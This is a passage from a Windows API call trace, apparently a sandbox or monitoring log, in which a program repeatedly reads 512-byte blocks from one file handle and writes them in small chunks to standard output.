lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.726] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.726] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.727] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.727] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.727] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.727] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.728] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.728] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.728] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.728] GetFileType (hFile=0x50) returned 0x1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] GetFileType (hFile=0x50) returned 0x1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] GetFileType (hFile=0x50) returned 0x1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] GetFileType (hFile=0x50) returned 0x1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] GetFileType (hFile=0x50) returned 0x1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] GetFileType (hFile=0x50) returned 0x1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] GetFileType (hFile=0x50) returned 0x1 [0207.729] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.729] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.729] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.729] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.730] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] GetFileType (hFile=0x50) returned 0x1 [0207.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.730] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.731] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.731] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] GetFileType (hFile=0x50) returned 0x1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.731] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.732] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.732] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.732] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.733] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.733] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] GetFileType (hFile=0x50) returned 0x1 [0207.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.733] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.734] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.734] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle 